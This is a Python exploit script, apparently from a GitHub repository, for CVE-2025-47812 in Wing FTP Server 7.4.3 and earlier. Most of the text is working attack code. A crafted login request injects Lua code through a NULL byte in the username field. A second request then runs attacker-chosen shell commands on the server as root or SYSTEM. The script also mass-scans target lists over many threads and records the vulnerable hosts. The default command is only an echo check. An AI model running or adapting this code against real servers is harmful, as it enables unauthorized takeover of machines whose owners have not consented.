README.md
Rendering markdown...
#!/usr/bin/env python3
# Exploit Title: Wing FTP Server 7.4.3 - Unauthenticated Remote Code Execution (RCE)
# CVE: CVE-2025-47812
# Date: 2025-06-30
# Original Exploit Author: Sheikh Mohammad Hasan aka 4m3rr0r (https://github.com/4m3rr0r)
# Modified by: d3vn0mi (https://github.com/d3vn0mi)
# Vendor Homepage: https://www.wftpserver.com/
# Version: Wing FTP Server <= 7.4.3
# Tested on: Linux (Root Privileges), Windows (SYSTEM Privileges)
# Description:
# Wing FTP Server versions prior to 7.4.4 are vulnerable to an unauthenticated
# remote code execution (RCE) flaw (CVE-2025-47812). This vulnerability arises from
# improper handling of NULL bytes in the 'username' parameter during login, leading
# to Lua code injection into session files. These maliciously crafted session files
# are subsequently executed when authenticated functionalities (e.g., /dir.html) are
# accessed, resulting in arbitrary command execution on the server with elevated
# privileges (root on Linux, SYSTEM on Windows).
import argparse
import logging
import re
import sys
import time
from concurrent.futures import ThreadPoolExecutor, as_completed
from urllib.parse import quote, urlparse
import requests
import urllib3
# Suppress only the InsecureRequestWarning from urllib3 when --no-verify is used
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
BANNER = r"""
____ _______ ___ __ ____ __ ___ ____
/ __ \|__ / | / / | / / __ \/ |/ // _/
/ / / / /_ <| | / /| |/ / / / / /|_/ / / /
/ /_/ /___/ /| |/ / | / /_/ / / / /_/ /
/_____/____/ |___/ |_/ \____/_/ /_/____/
CVE-2025-47812 | Wing FTP Server <= 7.4.3
Unauthenticated Remote Code Execution
Original Author: 4m3rr0r | Modified: d3vn0mi
"""
# Default command used when no custom command is provided (safe check)
DEFAULT_CHECK_CMD = "echo CVE-2025-47812-VULN"
VULN_MARKER = "CVE-2025-47812-VULN"
# Configure module-level logger
logger = logging.getLogger("cve-2025-47812")
def setup_logging(verbose: bool = False, log_file: str | None = None) -> None:
"""Configure logging with console and optional file output."""
level = logging.DEBUG if verbose else logging.INFO
logger.setLevel(level)
formatter = logging.Formatter(
"%(asctime)s [%(levelname)s] %(message)s",
datefmt="%Y-%m-%d %H:%M:%S",
)
# Console handler with color support
console = logging.StreamHandler(sys.stderr)
console.setLevel(level)
console.setFormatter(_ColorFormatter(formatter))
logger.addHandler(console)
# Optional file handler (no colors)
if log_file:
fh = logging.FileHandler(log_file, encoding="utf-8")
fh.setLevel(logging.DEBUG)
fh.setFormatter(formatter)
logger.addHandler(fh)
logger.info("Logging to file: %s", log_file)
class _ColorFormatter(logging.Formatter):
"""Wrap an existing formatter to inject ANSI colors per level."""
COLORS = {
logging.DEBUG: "\033[90m", # gray
logging.INFO: "\033[92m", # green
logging.WARNING: "\033[93m", # yellow
logging.ERROR: "\033[91m", # red
logging.CRITICAL: "\033[95m", # magenta
}
RESET = "\033[0m"
def __init__(self, base_formatter: logging.Formatter):
super().__init__()
self._base = base_formatter
def format(self, record: logging.LogRecord) -> str:
msg = self._base.format(record)
color = self.COLORS.get(record.levelno, "")
return f"{color}{msg}{self.RESET}"
def validate_url(url: str) -> str:
"""Normalise and validate a target URL."""
url = url.rstrip("/")
parsed = urlparse(url)
if parsed.scheme not in ("http", "https"):
raise ValueError(f"Unsupported URL scheme: {parsed.scheme!r}")
if not parsed.hostname:
raise ValueError(f"Missing hostname in URL: {url!r}")
return url
def build_payload(username: str, password: str, command: str) -> str:
"""Construct the injection payload for the login POST body."""
encoded_username = quote(username)
encoded_password = quote(password)
# The NULL byte terminates the C string in c_CheckUser(), but the full
# username (including Lua code) is written into the session file.
lua_injection = (
"%00]]%0d"
f"local+h+%3d+io.popen(\"{command}\")%0d"
"local+r+%3d+h%3aread(\"*a\")%0d"
"h%3aclose()%0d"
"print(r)%0d"
"--"
)
return f"username={encoded_username}{lua_injection}&password={encoded_password}"
def run_exploit(
target_url: str,
command: str,
username: str = "anonymous",
password: str = "",
timeout: int = 15,
verify_ssl: bool = True,
retries: int = 2,
) -> tuple[bool, str]:
"""
Execute the CVE-2025-47812 exploit against a single target.
Returns a tuple of (is_vulnerable: bool, output: str).
"""
target_url = validate_url(target_url)
host = urlparse(target_url).netloc
common_headers = {
"Host": host,
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:139.0) Gecko/20100101 Firefox/139.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8",
"Accept-Language": "en-US,en;q=0.5",
"Accept-Encoding": "gzip, deflate, br",
"Connection": "keep-alive",
"Upgrade-Insecure-Requests": "1",
}
login_url = f"{target_url}/loginok.html"
payload = build_payload(username, password, command)
login_headers = {
**common_headers,
"Content-Type": "application/x-www-form-urlencoded",
"Origin": target_url,
"Referer": f"{target_url}/login.html?lang=english",
"Cookie": "client_lang=english",
}
# --- Stage 1: POST to inject Lua via session file ---
logger.debug("Stage 1 -> POST %s (user=%s, cmd=%s)", login_url, username, command)
login_response = _request_with_retry(
"POST", login_url, headers=login_headers, data=payload,
timeout=timeout, verify=verify_ssl, retries=retries,
)
if login_response is None:
return False, ""
set_cookie = login_response.headers.get("Set-Cookie", "")
match = re.search(r"UID=([^;]+)", set_cookie)
if not match:
logger.error("UID not found in Set-Cookie for %s — exploit may have failed", target_url)
return False, ""
uid = match.group(1)
logger.debug("Extracted UID: %s", uid)
# --- Stage 2: GET /dir.html to trigger Lua execution ---
dir_url = f"{target_url}/dir.html"
dir_headers = {
**common_headers,
"Cookie": f"UID={uid}",
}
logger.debug("Stage 2 -> GET %s (UID=%s)", dir_url, uid)
dir_response = _request_with_retry(
"GET", dir_url, headers=dir_headers,
timeout=timeout, verify=verify_ssl, retries=retries,
)
if dir_response is None:
return False, ""
# Extract command output (appears before XML response body)
body = dir_response.text
clean_output = re.split(r"<\?xml", body)[0].strip()
is_vuln = bool(clean_output)
if is_vuln:
logger.info("VULNERABLE: %s", target_url)
else:
logger.warning("Not vulnerable: %s", target_url)
return is_vuln, clean_output
def _request_with_retry(
method: str,
url: str,
retries: int = 2,
**kwargs,
) -> requests.Response | None:
"""Send an HTTP request with retry + exponential backoff on failure."""
last_err = None
for attempt in range(1, retries + 2): # retries + 1 total attempts
try:
resp = requests.request(method, url, **kwargs)
resp.raise_for_status()
return resp
except requests.exceptions.RequestException as exc:
last_err = exc
if attempt <= retries:
wait = 2 ** attempt
logger.warning(
"Request to %s failed (attempt %d/%d): %s — retrying in %ds",
url, attempt, retries + 1, exc, wait,
)
time.sleep(wait)
else:
logger.error("Request to %s failed after %d attempts: %s", url, attempt, exc)
return None
def load_targets(url: str | None, filepath: str | None) -> list[str]:
"""Return a deduplicated list of target URLs from CLI args."""
targets: list[str] = []
if filepath:
try:
with open(filepath, "r") as fh:
for line in fh:
stripped = line.strip()
if stripped and not stripped.startswith("#"):
targets.append(stripped)
except OSError as exc:
logger.error("Could not read target file %r: %s", filepath, exc)
sys.exit(1)
if url:
targets.append(url)
# Deduplicate while preserving order
seen: set[str] = set()
unique: list[str] = []
for t in targets:
normed = t.rstrip("/")
if normed not in seen:
seen.add(normed)
unique.append(normed)
return unique
def main() -> None:
parser = argparse.ArgumentParser(
description="CVE-2025-47812 — Wing FTP Server <= 7.4.3 Unauthenticated RCE",
formatter_class=argparse.RawDescriptionHelpFormatter,
epilog="Examples:\n"
" %(prog)s -u http://192.168.1.10\n"
" %(prog)s -u http://192.168.1.10 -c 'id'\n"
" %(prog)s -f targets.txt -o vuln.txt -t 8\n",
)
target_group = parser.add_argument_group("target")
target_group.add_argument(
"-u", "--url", type=str,
help="Single target URL (e.g. http://192.168.134.130)",
)
target_group.add_argument(
"-f", "--file", type=str,
help="File containing target URLs (one per line, # comments allowed)",
)
exploit_group = parser.add_argument_group("exploit options")
exploit_group.add_argument(
"-c", "--command", type=str,
help="Command to execute on the remote server (enables verbose output)",
)
exploit_group.add_argument(
"-U", "--username", type=str, default="anonymous",
help="Username for the exploit payload (default: anonymous)",
)
exploit_group.add_argument(
"-P", "--password", type=str, default="",
help="Password for the exploit payload (default: empty)",
)
output_group = parser.add_argument_group("output")
output_group.add_argument(
"-v", "--verbose", action="store_true",
help="Enable verbose / debug logging",
)
output_group.add_argument(
"-o", "--output", type=str,
help="Save vulnerable URLs to this file",
)
output_group.add_argument(
"-l", "--log-file", type=str,
help="Write detailed log to this file",
)
net_group = parser.add_argument_group("network")
net_group.add_argument(
"-t", "--threads", type=int, default=1,
help="Number of concurrent threads for multi-target scans (default: 1)",
)
net_group.add_argument(
"--timeout", type=int, default=15,
help="HTTP request timeout in seconds (default: 15)",
)
net_group.add_argument(
"--retries", type=int, default=2,
help="Number of retries on connection failure (default: 2)",
)
net_group.add_argument(
"--no-verify", action="store_true",
help="Disable SSL certificate verification",
)
args = parser.parse_args()
if not args.url and not args.file:
parser.error("Either -u/--url or -f/--file must be specified.")
# When a custom command is provided, force verbose so the user sees output
verbose = args.verbose or bool(args.command)
setup_logging(verbose=verbose, log_file=args.log_file)
print(BANNER)
command = args.command if args.command else DEFAULT_CHECK_CMD
targets = load_targets(args.url, args.file)
if not targets:
logger.error("No valid targets provided.")
sys.exit(1)
logger.info("Loaded %d target(s) — threads=%d, timeout=%ds, retries=%d",
len(targets), args.threads, args.timeout, args.retries)
vulnerable: list[str] = []
verify_ssl = not args.no_verify
def _attack(target: str) -> tuple[str, bool, str]:
is_vuln, output = run_exploit(
target, command,
username=args.username,
password=args.password,
timeout=args.timeout,
verify_ssl=verify_ssl,
retries=args.retries,
)
return target, is_vuln, output
with ThreadPoolExecutor(max_workers=args.threads) as pool:
futures = {pool.submit(_attack, t): t for t in targets}
for future in as_completed(futures):
target = futures[future]
try:
target, is_vuln, output = future.result()
except Exception:
logger.exception("Unhandled error processing %s", target)
continue
if is_vuln:
vulnerable.append(target)
if args.command:
print(f"\n--- Output from {target} ---")
print(output)
print("----------------------------\n")
# Summary
print()
logger.info("Scan complete: %d/%d targets vulnerable", len(vulnerable), len(targets))
if args.output and vulnerable:
try:
with open(args.output, "w") as out_file:
for site in vulnerable:
out_file.write(site + "\n")
logger.info("Vulnerable URLs saved to: %s", args.output)
except OSError as exc:
logger.error("Could not write to output file %r: %s", args.output, exc)
if __name__ == "__main__":
main()